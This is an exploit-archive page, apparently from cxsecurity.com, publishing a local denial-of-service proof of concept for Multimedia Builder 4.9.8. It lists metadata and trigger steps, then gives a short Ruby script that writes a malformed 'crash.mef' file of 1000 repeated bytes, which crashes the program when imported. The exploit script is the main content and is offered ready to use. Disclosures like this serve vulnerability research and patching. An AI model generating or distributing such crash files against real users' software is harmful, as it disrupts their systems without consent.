Multimedia Builder 4.9.8 Denial Of Service

2012.05.16
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Multimedia Builder 4.9.8 Malicious mef File Denial of service =================================================================================== # Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # Website: www.infosec4all.tk # version: 4.9.8 # Category: DOS # Tested on: windows XP SP3 =================================================================================== ########################################DESC#################################################### #Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a # #malicious .mef file. # #To trigger the exploit , go to file->MEF Import ->load MEF # # ################################################################################################ #!/usr/bin/ruby File.open "crash.mef" , "w" do |file| crash = "\x41" * 1000 file.write crash end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top